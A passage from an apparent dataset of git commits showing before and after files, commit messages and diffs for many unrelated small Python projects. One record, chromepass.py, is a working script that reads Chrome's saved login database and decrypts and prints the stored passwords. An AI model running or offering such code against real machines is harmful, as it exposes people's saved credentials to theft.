local_cache_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
def tear_down():
try:
shutil.rmtree(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
local_cache_dir_patcher.stop()
try:
shutil.rmtree(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
local_data_dir_patcher.stop()
|
Correct import order in tests init file
|
Correct import order in tests init file
|
Python
|
mit
|
caleb531/youversion-suggest,caleb531/youversion-suggest
|
---
+++
@@ -5,9 +5,9 @@
import shutil
import tempfile
-import yvs.shared as yvs
from mock import patch
+import yvs.shared as yvs
temp_dir = tempfile.gettempdir()
local_data_dir_patcher = patch(
|
f2dc9b260e6ca1fcf46b9f23fad5478ab7ff28f8
|
ce/expr/common.py
|
ce/expr/common.py
|
#!/usr/bin/env python
# vim: set fileencoding=UTF-8 :
from __future__ import print_function
ADD_OP = '+'
MULTIPLY_OP = '*'
OPERATORS = [ADD_OP, MULTIPLY_OP]
_cache_map = dict()
def cached(f):
def decorated(*args, **kwargs):
key = (f, tuple(args), tuple(kwargs.items()))
if key in _cache_map:
return _cache_map[key]
v = f(*args, **kwargs)
_cache_map[key] = v
return v
return decorated
|
#!/usr/bin/env python
# vim: set fileencoding=UTF-8 :
from __future__ import print_function
ADD_OP = '+'
MULTIPLY_OP = '*'
OPERATORS = [ADD_OP, MULTIPLY_OP]
def to_immutable(*m):
def r(d):
if isinstance(d, dict):
return tuple((e, to_immutable(v)) for e, v in d.iteritems())
if isinstance(d, (list, tuple)):
return tuple(to_immutable(e) for e in d)
return d
return tuple(r(e) for e in m)
_cache_map = dict()
def cached(f):
def decorated(*args, **kwargs):
key = to_immutable(f, args, kwargs.items())
if key in _cache_map:
return _cache_map[key]
v = f(*args, **kwargs)
_cache_map[key] = v
return v
return decorated
|
Fix dict argument not hashable
|
Fix dict argument not hashable
|
Python
|
mit
|
admk/soap
|
---
+++
@@ -11,12 +11,22 @@
OPERATORS = [ADD_OP, MULTIPLY_OP]
+def to_immutable(*m):
+ def r(d):
+ if isinstance(d, dict):
+ return tuple((e, to_immutable(v)) for e, v in d.iteritems())
+ if isinstance(d, (list, tuple)):
+ return tuple(to_immutable(e) for e in d)
+ return d
+ return tuple(r(e) for e in m)
+
+
_cache_map = dict()
def cached(f):
def decorated(*args, **kwargs):
- key = (f, tuple(args), tuple(kwargs.items()))
+ key = to_immutable(f, args, kwargs.items())
if key in _cache_map:
return _cache_map[key]
v = f(*args, **kwargs)
|
f256fc04361dc1a0e57c2a17d2216eadee03f987
|
test_pytnt.py
|
test_pytnt.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 30 20:22:29 2013
@author: chris
Test script for the pytnt project
"""
import unittest
from numpy.testing import assert_allclose
from processTNT import TNTfile
class TestLoadFile(unittest.TestCase):
"""Tests that pytnt can load files"""
def test_load_time_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1.tnt")
def test_load_freq_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1-ftp.tnt")
def test_load_fails(self):
with self.assertRaises(AssertionError):
zero = TNTfile("/dev/zero")
class TestFourierTransform(unittest.TestCase):
"""Test that the Fourier Transform is done correctly
Makes sure that the reference frequency is taken into account properly
"""
def test_ref1(self):
time_domain = TNTfile("testdata/LiCl_ref1.tnt")
freq_domain = TNTfile("testdata/LiCl_ref1-ftp.tnt")
lb = freq_domain.TMG2['linebrd'][0, 0]
my_ft = time_domain.LBfft(lb, 1)
assert_allclose(freq_domain.DATA, my_ft)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 30 20:22:29 2013
@author: chris
Test script for the pytnt project
"""
import unittest
import numpy as np
from numpy.testing import assert_allclose
from processTNT import TNTfile
class TestLoadFile(unittest.TestCase):
"""Tests that pytnt can load files"""
def test_load_time_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1.tnt")
def test_load_freq_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1-ftp.tnt")
def test_load_fails(self):
with self.assertRaises(AssertionError):
zero = TNTfile("/dev/zero")
class TestFourierTransform(unittest.TestCase):
"""Test that the Fourier Transform is done correctly
Makes sure that the reference frequency is taken into account properly
"""
def test_ref1(self):
time_domain = TNTfile("testdata/LiCl_ref1.tnt")
freq_domain = TNTfile("testdata/LiCl_ref1-ftp.tnt")
lb = freq_domain.TMG2['linebrd'][0, 0]
ph0 = freq_domain.TMG2['cumm_0_phase'][0, 0]
my_ft = time_domain.LBfft(lb, 1, phase=np.deg2rad(ph0))
assert_allclose(freq_domain.DATA, my_ft)
if __name__ == '__main__':
unittest.main()
|
Use the phase from the pre-FT'd file for the test FT
|
Use the phase from the pre-FT'd file for the test FT
|
Python
|
bsd-3-clause
|
chatcannon/pytnt,chatcannon/pytnt
|
---
+++
@@ -9,6 +9,7 @@
import unittest
+import numpy as np
from numpy.testing import assert_allclose
from processTNT import TNTfile
@@ -41,8 +42,9 @@
freq_domain = TNTfile("testdata/LiCl_ref1-ftp.tnt")
lb = freq_domain.TMG2['linebrd'][0, 0]
+ ph0 = freq_domain.TMG2['cumm_0_phase'][0, 0]
- my_ft = time_domain.LBfft(lb, 1)
+ my_ft = time_domain.LBfft(lb, 1, phase=np.deg2rad(ph0))
assert_allclose(freq_domain.DATA, my_ft)
|
21df4ca35588993b00e610523f264be51e631b77
|
classifier/run.py
|
classifier/run.py
|
import time
from clean_tweet import TweetClassifier as TC
from gather_data import GatherData
def run_test(val, expected):
print "{0} (exp {1}) >> {2}".format(t.predict(val), expected, val)
# Start by gathering some data
g = GatherData()
g.gather_tweets()
g.write_tweets("train_data.txt")
time.sleep(3)
g.gather_tweets()
g.write_tweets("test_data.txt")
# train the classifier
t = TC("train_data.txt")
t.train()
# test the classifier
tested = 0
correct = 0
with open('test_data.txt', 'r') as f:
for line in f.readlines():
tested += 1
line = line[:-1]
if t.predict(line[:-1]) == int(line[-1]):
correct += 1
print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/tested)
|
import os
import shutil
import time
from clean_tweet import TweetClassifier as TC
from gather_data import GatherData
def run_test(val, expected):
print "{0} (exp {1}) >> {2}".format(t.predict(val), expected, val)
# Start by gathering some data.
g = GatherData()
# If we have an existing training set, this becomes the new test set (just for variety)
if os.path.isfile("train_data.txt"):
print "Old training data is the new test data..."
shutil.copyfile("train_data.txt", "test_data.txt")
else:
print "Gathering new test data"
g.gather_tweets()
g.write_tweets("test_data.txt")
time.sleep(3)
# gather new training data
print "Gathering training data..."
g.gather_tweets()
g.write_tweets("train_data.txt")
# train the classifier
print "Training the classifier..."
t = TC("train_data.txt")
t.train()
# test the classifier
print "Testing the classifier..."
tested = 0
correct = 0
with open('test_data.txt', 'r') as f:
for line in f.readlines():
tested += 1
line = line[:-1]
if t.predict(line[:-1]) == int(line[-1]):
correct += 1
print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/float(tested))
|
Copy over train to new test data
|
Copy over train to new test data
|
Python
|
mit
|
will-hart/twitter_sentiment,will-hart/twitter_sentiment
|
---
+++
@@ -1,3 +1,5 @@
+import os
+import shutil
import time
from clean_tweet import TweetClassifier as TC
@@ -7,20 +9,31 @@
def run_test(val, expected):
print "{0} (exp {1}) >> {2}".format(t.predict(val), expected, val)
-# Start by gathering some data
+# Start by gathering some data.
g = GatherData()
+
+# If we have an existing training set, this becomes the new test set (just for variety)
+if os.path.isfile("train_data.txt"):
+ print "Old training data is the new test data..."
+ shutil.copyfile("train_data.txt", "test_data.txt")
+else:
+ print "Gathering new test data"
+ g.gather_tweets()
+ g.write_tweets("test_data.txt")
+ time.sleep(3)
+
+# gather new training data
+print "Gathering training data..."
g.gather_tweets()
g.write_tweets("train_data.txt")
-time.sleep(3)
-g.gather_tweets()
-g.write_tweets("test_data.txt")
-
# train the classifier
+print "Training the classifier..."
t = TC("train_data.txt")
t.train()
# test the classifier
+print "Testing the classifier..."
tested = 0
correct = 0
@@ -31,4 +44,4 @@
if t.predict(line[:-1]) == int(line[-1]):
correct += 1
-print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/tested)
+print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/float(tested))
|
773f78ae283a062818394743dea4535456ac9aeb
|
ckanext/qa/lib.py
|
ckanext/qa/lib.py
|
import json
import ckan.model as model
import ckan.plugins as p
def get_site_url(config):
return config.get('ckan.site_url_internally') or config['ckan.site_url']
def get_user_and_context(site_url):
user = p.toolkit.get_action('get_site_user')(
{'model': model, 'ignore_auth': True}, {}
)
context = json.dumps({
'site_url': site_url,
'apikey': user.get('apikey'),
'site_user_apikey': user.get('apikey'),
'username': user.get('name'),
})
return user, context
|
import json
import ckan.model as model
import ckan.plugins as p
def get_site_url(config):
return config.get('ckan.site_url_internally') or config['ckan.site_url']
def get_user_and_context(site_url):
user = p.toolkit.get_action('get_site_user')(
{'model': model, 'ignore_auth': True, 'defer_commit': True}, {}
)
context = json.dumps({
'site_url': site_url,
'apikey': user.get('apikey'),
'site_user_apikey': user.get('apikey'),
'username': user.get('name'),
})
return user, context
|
Fix for getting site_user the first time. (A commit herecauses problems during a db write notification. Spotted when harvesting)
|
[1268] Fix for getting site_user the first time. (A commit herecauses problems during a db write notification. Spotted when harvesting)
|
Python
|
mit
|
ckan/ckanext-qa,ckan/ckanext-qa,ckan/ckanext-qa
|
---
+++
@@ -8,7 +8,7 @@
def get_user_and_context(site_url):
user = p.toolkit.get_action('get_site_user')(
- {'model': model, 'ignore_auth': True}, {}
+ {'model': model, 'ignore_auth': True, 'defer_commit': True}, {}
)
context = json.dumps({
'site_url': site_url,
|
8f11df0dce9da94d197793bccd4a34e33e78b377
|
clean_packages.py
|
clean_packages.py
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import os
import requests
token = os.getenv("PACKAGECLOUD_TOKEN")
repository = "jollheef/henhouse"
api_url = "https://%s:@packagecloud.io/api/v1/repos/%s/" % (token, repository)
name = 'henhouse'
def delete_package(filename):
response = requests.delete(api_url+filename)
print("Delete package status: %d" % response.status_code)
packages = requests.get(api_url+"/packages.json").json()
for pkg in packages[:-9]:
if pkg['name'] == name:
delete_package(pkg['distro_version']+"/"+pkg['filename'])
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import os
import requests
token = os.getenv("PACKAGECLOUD_TOKEN")
repository = "jollheef/henhouse"
api_url = "https://%s:@packagecloud.io/api/v1/repos/%s/" % (token, repository)
name = 'henhouse'
def delete_package(filename):
response = requests.delete(api_url+filename)
print("Delete package status: %d" % response.status_code)
packages = requests.get(api_url+"/packages.json").json()
for pkg in packages[:-2]:
if pkg['name'] == name:
delete_package(pkg['distro_version']+"/"+pkg['filename'])
|
Save only 3 packages instead of 10
|
Save only 3 packages instead of 10
|
Python
|
agpl-3.0
|
jollheef/henhouse,jollheef/henhouse,jollheef/henhouse,jollheef/henhouse
|
---
+++
@@ -15,6 +15,6 @@
packages = requests.get(api_url+"/packages.json").json()
-for pkg in packages[:-9]:
+for pkg in packages[:-2]:
if pkg['name'] == name:
delete_package(pkg['distro_version']+"/"+pkg['filename'])
|
4ab06b1a8298656af5d0eee6587ff4ab63282901
|
nbrmd/__init__.py
|
nbrmd/__init__.py
|
"""R markdown notebook format for Jupyter
Use this module to read or write Jupyter notebooks as Rmd documents (methods 'read', 'reads', 'write', 'writes')
Use the 'pre_save_hook' method (see its documentation) to automatically dump your Jupyter notebooks as a Rmd file, in addition
to the ipynb file.
Use the 'nbrmd' conversion script to convert Jupyter notebooks from/to R markdown notebooks.
"""
from .nbrmd import read, reads, readf, write, writes, writef
from .hooks import update_rmd, update_ipynb, update_rmd_and_ipynb, update_selected_formats
try:
from .cm import RmdFileContentsManager
except ImportError as e:
RmdFileContentsManager = e.message
|
"""R markdown notebook format for Jupyter
Use this module to read or write Jupyter notebooks as Rmd documents (methods 'read', 'reads', 'write', 'writes')
Use the 'pre_save_hook' method (see its documentation) to automatically dump your Jupyter notebooks as a Rmd file, in addition
to the ipynb file.
Use the 'nbrmd' conversion script to convert Jupyter notebooks from/to R markdown notebooks.
"""
from .nbrmd import read, reads, readf, write, writes, writef
from .hooks import update_rmd, update_ipynb, update_rmd_and_ipynb, update_selected_formats
try:
from .cm import RmdFileContentsManager
except ImportError as e:
RmdFileContentsManager = str(e)
|
Save error message when cm not imported
|
Save error message when cm not imported
|
Python
|
mit
|
mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext
|
---
+++
@@ -13,4 +13,4 @@
try:
from .cm import RmdFileContentsManager
except ImportError as e:
- RmdFileContentsManager = e.message
+ RmdFileContentsManager = str(e)
|
85ca1534dc5d1f9b45cfec27d247f0932b2d7c52
|
plugin/build.py
|
plugin/build.py
|
# The source code is compiled into a Roblox Model right into the plugins folder.
#
# Simply run `python build.py` and everything will be taken care of. You can
# then load up any game and test out the plugin.
import os
import os.path
from elixir.compilers import ModelCompiler
local_app_data = os.environ["LocalAppData"]
plugins_folder = os.path.join(local_app_data, "Roblox/Plugins")
plugin = os.path.join(plugins_folder, "StudioBridge.rbxmx")
ModelCompiler("src/", plugin).compile()
|
# The source code is compiled into a Roblox Model right into the plugins folder.
#
# Simply run `python build.py` and everything will be taken care of. You can
# then load up any game and test out the plugin.
import os
import os.path
from elixir.compilers import ModelCompiler
local_app_data = os.environ["LocalAppData"]
plugins_folder = os.path.join(local_app_data, "Roblox/Plugins")
plugin = os.path.join(plugins_folder, "StudioBridge.rbxmx")
parent_dir = os.path.dirname(__file__)
ModelCompiler(os.path.join(parent_dir, "src/"), plugin).compile()
|
Allow the plugin to be compiled from anywhere
|
Allow the plugin to be compiled from anywhere
Because we were only using "src/" as the path, running build.py from anywhere but the 'plugin' would cause it to fail to locate the directory.
We're now using a path relative to the file, so it isn't dependant on where the file is called from.
|
Python
|
mit
|
vocksel/studio-bridge-cli
|
---
+++
@@ -12,4 +12,6 @@
plugins_folder = os.path.join(local_app_data, "Roblox/Plugins")
plugin = os.path.join(plugins_folder, "StudioBridge.rbxmx")
-ModelCompiler("src/", plugin).compile()
+parent_dir = os.path.dirname(__file__)
+
+ModelCompiler(os.path.join(parent_dir, "src/"), plugin).compile()
|
f44ac32bc9060cfa5ea6ce4284ce7f15b466be28
|
openedx/core/release.py
|
openedx/core/release.py
|
"""
Information about the release line of this Open edX code.
"""
# The release line: an Open edX release name ("ficus"), or "master".
# This should always be "master" on the master branch, and will be changed
# manually when we start release-line branches, like open-release/ficus.master.
RELEASE_LINE = "master"
def doc_version():
"""The readthedocs.org version name used in documentation references.
Returns a short string like "latest" or "open-release-ficus.master".
"""
if RELEASE_LINE == "master":
return "latest"
else:
return "open-release-{}.master".format(RELEASE_LINE)
|
"""
Information about the release line of this Open edX code.
"""
# The release line: an Open edX release name ("ficus"), or "master".
# This should always be "master" on the master branch, and will be changed
# manually when we start release-line branches, like open-release/ficus.master.
RELEASE_LINE = "hawthorn"
def doc_version():
"""The readthedocs.org version name used in documentation references.
Returns a short string like "latest" or "open-release-ficus.master".
"""
if RELEASE_LINE == "master":
return "latest"
else:
return "open-release-{}.master".format(RELEASE_LINE)
|
Set the RELEASE_LINE to hawthorn
|
Set the RELEASE_LINE to hawthorn
|
Python
|
agpl-3.0
|
appsembler/edx-platform,BehavioralInsightsTeam/edx-platform,appsembler/edx-platform,kmoocdev2/edx-platform,gymnasium/edx-platform,gsehub/edx-platform,gymnasium/edx-platform,Edraak/edraak-platform,Edraak/edraak-platform,BehavioralInsightsTeam/edx-platform,kmoocdev2/edx-platform,CredoReference/edx-platform,Edraak/edraak-platform,gsehub/edx-platform,kmoocdev2/edx-platform,CredoReference/edx-platform,CredoReference/edx-platform,Stanford-Online/edx-platform,Stanford-Online/edx-platform,appsembler/edx-platform,gsehub/edx-platform,kmoocdev2/edx-platform,Edraak/edraak-platform,BehavioralInsightsTeam/edx-platform,BehavioralInsightsTeam/edx-platform,Stanford-Online/edx-platform,gymnasium/edx-platform,appsembler/edx-platform,gsehub/edx-platform,kmoocdev2/edx-platform,gymnasium/edx-platform,Stanford-Online/edx-platform,CredoReference/edx-platform
|
---
+++
@@ -5,7 +5,7 @@
# The release line: an Open edX release name ("ficus"), or "master".
# This should always be "master" on the master branch, and will be changed
# manually when we start release-line branches, like open-release/ficus.master.
-RELEASE_LINE = "master"
+RELEASE_LINE = "hawthorn"
def doc_version():
|
cf336ac17ba194066517ab93ea7079415adba0c2
|
sum.py
|
sum.py
|
import sublime, sublime_plugin
class SumCommand(sublime_plugin.TextCommand):
def run(self, edit):
sum_view = self.view.window().new_file()
sum_view.set_name('Sum')
file_text = self.view.substr(sublime.Region(0, self.view.size()))
sum_view.insert(edit, 0, file_text)
sum_view.set_read_only(True)
sum_view.set_scratch(True)
|
import sublime, sublime_plugin
class SumCommand(sublime_plugin.TextCommand):
def run(self, edit):
sum_view = self.view.window().new_file()
sum_view.set_name('Sum')
file_text = self.view.substr(sublime.Region(0, self.view.size()))
numbers = []
for s in file_text.split():
if s.isdigit():
numbers.append(int(s))
else:
try:
numbers.append(float(s))
except ValueError:
pass
result = sum(numbers)
sum_view.insert(edit, 0, str(result))
sum_view.set_read_only(True)
sum_view.set_scratch(True)
|
Add up all ints (base 10) and floats in the file
|
Add up all ints (base 10) and floats in the file
|
Python
|
mit
|
jbrudvik/sublime-sum,jbrudvik/sublime-sum
|
---
+++
@@ -6,7 +6,19 @@
sum_view.set_name('Sum')
file_text = self.view.substr(sublime.Region(0, self.view.size()))
- sum_view.insert(edit, 0, file_text)
+
+ numbers = []
+ for s in file_text.split():
+ if s.isdigit():
+ numbers.append(int(s))
+ else:
+ try:
+ numbers.append(float(s))
+ except ValueError:
+ pass
+
+ result = sum(numbers)
+ sum_view.insert(edit, 0, str(result))
sum_view.set_read_only(True)
sum_view.set_scratch(True)
|
4f6ab3cf6effd2a7e05c56535c426f33e689f627
|
chromepass.py
|
chromepass.py
|
from os import getenv
import sqlite3
import win32crypt
appdata = getenv("APPDATA")
connection = sqlite3.connect(appdata + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print 'website_link ' + information[0]
print 'Username: ' + information[1]
print 'Password: ' + password
|
from os import getenv
import sqlite3
import win32crypt
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
|
Make Python3 friendly. Add appdata check and fix.
|
Make Python3 friendly. Add appdata check and fix.
Confirmed working on Windows 7 Python 3.4 Installation Now :D
|
Python
|
mit
|
hassaanaliw/chromepass
|
---
+++
@@ -3,7 +3,9 @@
import win32crypt
appdata = getenv("APPDATA")
-connection = sqlite3.connect(appdata + "\..\Local\Google\Chrome\User Data\Default\Login Data")
+if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
+ appdata = appdata[:-8]
+connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
@@ -11,6 +13,6 @@
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
- print 'website_link ' + information[0]
- print 'Username: ' + information[1]
- print 'Password: ' + password
+ print('website_link ' + information[0])
+ print('Username: ' + information[1])
+ print('Password: ' + str(password))
|
89762635e5772376e191825aeb6f6b8d6f530792
|
markovsecrets/process/get_secret.py
|
markovsecrets/process/get_secret.py
|
import os
import json
from random import randrange, seed, sample
MAX_LEN = 50
def shift(s, new):
space = s.find(' ')
if space == -1:
raise Exception('bad shift string ' + s)
return s[space+1:] + ' ' + new
def main():
getw = lambda arr: sample(arr, 1)[0]
words = {}
starters = 0
wordlen = 1
seed()
with open('../data/mapping.json') as f:
words = json.load(f)
sparse = words.get('sparse').get('data')
dense = words.get('dense').get('data')
word = getw(sparse)
associated = sparse[word]
secret = word + ' ' + getw(associated)
word = secret
while wordlen < MAX_LEN:
associated = dense.get(word, [])
if len(associated) == 0:
break
tmp = getw(associated)
secret += ' ' + tmp
word = shift(word, tmp)
wordlen += 1
print secret
if __name__ == '__main__':
main()
|
import os
import json
from random import randrange, seed, sample
MAX_LEN = 75
def shift(s, new):
space = s.find(' ')
if space == -1:
raise Exception('bad shift string ' + s)
return s[space+1:] + ' ' + new
def main():
getw = lambda arr: sample(arr, 1)[0]
words = {}
starters = 0
wordlen = 1
seed()
with open('../data/mapping.json') as f:
words = json.load(f)
sparse = words.get('sparse').get('data')
dense = words.get('dense').get('data')
word = getw(sparse)
associated = sparse[word]
secret = word + ' ' + getw(associated)
word = secret
while wordlen < MAX_LEN:
associated = dense.get(word, [])
if len(associated) == 0:
break
tmp = getw(associated)
secret += ' ' + tmp
word = shift(word, tmp)
wordlen += 1
print secret
if __name__ == '__main__':
main()
|
Raise word limit by 50%
|
Raise word limit by 50%
|
Python
|
mit
|
oychang/Markovsecrets,oychang/Markovsecrets
|
---
+++
@@ -2,7 +2,7 @@
import json
from random import randrange, seed, sample
-MAX_LEN = 50
+MAX_LEN = 75
def shift(s, new):
|
fd85d735e1b4fafba470c91846faa23393cc26f7
|
simple_model/exceptions.py
|
simple_model/exceptions.py
|
class ValidationError(Exception):
pass
class EmptyField(ValidationError):
def __init__(self, field_name):
self.field_name = field_name
def __str__(self) -> str:
return '{} field cannot be empty'.format(self.field_name)
|
class ValidationError(Exception):
pass
class EmptyField(ValidationError):
def __init__(self, field_name):
self.field_name = field_name
def __str__(self) -> str:
return '{!r} field cannot be empty'.format(self.field_name)
|
Improve EmptyField exception string representation
|
Improve EmptyField exception string representation
|
Python
|
mit
|
lamenezes/simple-model
|
---
+++
@@ -7,4 +7,4 @@
self.field_name = field_name
def __str__(self) -> str:
- return '{} field cannot be empty'.format(self.field_name)
+ return '{!r} field cannot be empty'.format(self.field_name)
|
66ed7a95dff156ff8083ea9f0651a8b1d436c25e
|
kokki/cookbooks/busket/recipes/default.py
|
kokki/cookbooks/busket/recipes/default.py
|
import os
from kokki import *
Package("erlang")
# ubuntu's erlang is a bit messed up.. remove the man link
File("/usr/lib/erlang/man",
action = "delete")
# Package("mercurial",
# provider = "kokki.providers.package.easy_install.EasyInstallProvider")
command = os.path.join(env.config.busket.path, "bin", "busket")
Service("busket",
start_command = "%s start" % command,
stop_command = "%s stop" % command,
restart_command = "{0} start || {0} restart".format(command),
status_command = "%s ping" % command,
action = "nothing")
Script("install-busket",
not_if = lambda:os.path.exists(env.config.busket.path),
cwd = "/usr/local/src",
code = (
"git clone git://github.com/samuel/busket.git busket\n"
"cd busket\n"
"make release\n"
"mv rel/busket {install_path}\n"
).format(install_path=env.config.busket.path),
notifies = [("start", env.resources["Service"]["busket"])],
)
|
import os
from kokki import *
Package("erlang")
# ubuntu's erlang is a bit messed up.. remove the man link
File("/usr/lib/erlang/man",
action = "delete")
# Package("mercurial",
# provider = "kokki.providers.package.easy_install.EasyInstallProvider")
command = os.path.join(env.config.busket.path, "bin", "busket")
Service("busket",
start_command = "%s start" % command,
stop_command = "%s stop" % command,
restart_command = "{0} start || {0} restart".format(command),
status_command = "%s ping" % command,
action = "nothing")
Script("install-busket",
not_if = lambda:os.path.exists(env.config.busket.path),
cwd = "/usr/local/src",
code = (
"git clone git://github.com/samuel/busket.git busket\n"
"cd busket\n"
"mkdir /tmp/erlhome\n"
"export HOME=/tmp/erlhome\n"
"make release\n"
"mv rel/busket {install_path}\n"
).format(install_path=env.config.busket.path),
notifies = [("start", env.resources["Service"]["busket"])],
)
|
Make sure HOME is set when installing busket. Erlang requires it
|
Make sure HOME is set when installing busket. Erlang requires it
|
Python
|
bsd-3-clause
|
samuel/kokki
|
---
+++
@@ -25,6 +25,8 @@
code = (
"git clone git://github.com/samuel/busket.git busket\n"
"cd busket\n"
+ "mkdir /tmp/erlhome\n"
+ "export HOME=/tmp/erlhome\n"
"make release\n"
"mv rel/busket {install_path}\n"
).format(install_path=env.config.busket.path),
|
ad1b7cb8dda0dc2565aab6cd8c6a392753682875
|
wapiti/helpers.py
|
wapiti/helpers.py
|
# Copyright (c) Ecometrica. All rights reserved.
# Distributed under the BSD license. See LICENSE for details.
from collections import namedtuple
from decorator import decorator
from functools import wraps
from django.db.models import get_apps
from piston.utils import rc
from wapiti.conf import ID_RE
_RegisteredType = namedtuple('RegisteredType', ('api', ))
_registered_types = {}
def register(name, modelapi):
"""Register a model with the API"""
global _registered_types
if modelapi.__name__ in _registered_types:
return
if not modelapi.objects:
modelapi.objects = modelapi.model.objects
_registered_types[name] = _RegisteredType(api=modelapi)
def _api_method(f, *args, **kwargs):
return f(*args, **kwargs)
def api_method(f):
"""Decorator to declare a method api-accessible"""
f.api = True
return decorator(_api_method, f)
def _is_id(id):
return ID_RE.match(id)
def _register_models():
"""Find app api submodules and register models"""
for a in get_apps():
try:
_temp = __import__('.'.join(a.__name__.split('.')[:-1] + ['api']),
globals(), locals())
except ImportError:
pass
|
# Copyright (c) Ecometrica. All rights reserved.
# Distributed under the BSD license. See LICENSE for details.
from collections import namedtuple
from decorator import decorator
from functools import wraps
from django.db.models import get_apps
from piston.utils import rc
from wapiti.conf import ID_RE
_RegisteredType = namedtuple('RegisteredType', ('api', ))
_registered_types = {}
def register(name, modelapi):
"""Register a model with the API"""
global _registered_types
if modelapi.__name__ in _registered_types:
return
if not hasattr(modelapi, 'objects'):
modelapi.objects = modelapi.model.objects
_registered_types[name] = _RegisteredType(api=modelapi)
def _api_method(f, *args, **kwargs):
return f(*args, **kwargs)
def api_method(f):
"""Decorator to declare a method api-accessible"""
f.api = True
return decorator(_api_method, f)
def _is_id(id):
return ID_RE.match(id)
def _register_models():
"""Find app api submodules and register models"""
for a in get_apps():
try:
_temp = __import__('.'.join(a.__name__.split('.')[:-1] + ['api']),
globals(), locals())
except ImportError:
pass
|
Check for the existence of model.objects without calling it; may fix some weird buggy behaviour involving database migrations.
|
Check for the existence of model.objects without calling it; may fix some weird buggy behaviour involving database migrations.
|
Python
|
bsd-3-clause
|
ecometrica/django-wapiti
|
---
+++
@@ -18,7 +18,7 @@
global _registered_types
if modelapi.__name__ in _registered_types:
return
- if not modelapi.objects:
+ if not hasattr(modelapi, 'objects'):
modelapi.objects = modelapi.model.objects
_registered_types[name] = _RegisteredType(api=modelapi)
|
b2b1443753894ccb4835b8667b63d95ee7a1303f
|
Functions/echo-python/lambda_function.py
|
Functions/echo-python/lambda_function.py
|
"""Created By: Andrew Ryan DeFilippis"""
print('Lambda cold-start...')
from json import dumps, loads
def lambda_handler(event, context):
print('LOG RequestId: {}\tResponse:\n\n{}'.format(
context.aws_request_id,
dumps(event, indent=4)
))
return event
# Comment or remove everything below before deploying to Lambda.
def local_testing():
import context
with open('event.json', 'r') as f:
event = loads(f.read())
print("Event:\n\n{}\n\nFunction Output:\n".format(
dumps(
event,
indent=4
)
))
lambda_handler(event, context)
local_testing()
|
"""Created By: Andrew Ryan DeFilippis"""
print('Lambda cold-start...')
from json import dumps, loads
# Disable 'testing_locally' when deploying to AWS Lambda
testing_locally = False
verbose = False
class CWLogs(object):
def __init__(self, context):
self.context = context
def event(self, message, event_prefix='LOG'):
print('{} RequestId: {}\t{}'.format(
event_prefix,
self.context.aws_request_id,
message
))
def lambda_handler(event, context):
log = CWLogs(context)
if verbose is True:
log.event('Event: {}'.format(dumps(event)))
return event
def local_test():
import context
with open('event.json', 'r') as f:
event = loads(f.read())
print('\nFunction Log:\n')
lambda_handler(event, context)
if testing_locally is True:
local_test()
|
Update the echo Function to be similar to the template Function
|
Update the echo Function to be similar to the template Function
|
Python
|
apache-2.0
|
andrewdefilippis/aws-lambda
|
---
+++
@@ -5,30 +5,41 @@
from json import dumps, loads
+# Disable 'testing_locally' when deploying to AWS Lambda
+testing_locally = False
+verbose = False
+
+
+class CWLogs(object):
+ def __init__(self, context):
+ self.context = context
+
+ def event(self, message, event_prefix='LOG'):
+ print('{} RequestId: {}\t{}'.format(
+ event_prefix,
+ self.context.aws_request_id,
+ message
+ ))
+
+
def lambda_handler(event, context):
- print('LOG RequestId: {}\tResponse:\n\n{}'.format(
- context.aws_request_id,
- dumps(event, indent=4)
- ))
+ log = CWLogs(context)
+
+ if verbose is True:
+ log.event('Event: {}'.format(dumps(event)))
return event
-# Comment or remove everything below before deploying to Lambda.
-def local_testing():
+def local_test():
import context
with open('event.json', 'r') as f:
event = loads(f.read())
- print("Event:\n\n{}\n\nFunction Output:\n".format(
- dumps(
- event,
- indent=4
- )
- ))
+ print('\nFunction Log:\n')
lambda_handler(event, context)
-
-local_testing()
+if testing_locally is True:
+ local_test()
|
ff9049b23f12e67367798644eb3b5a8643ab7c31
|
wsgi_server.py
|
wsgi_server.py
|
from urlparse import parse_qs
import DQXUtils
import simplejson
import responders
def application(environ, start_response):
returndata = dict((k,v[0]) for k,v in parse_qs(environ['QUERY_STRING']).items())
request_type = returndata['datatype']
tm = DQXUtils.Timer()
try:
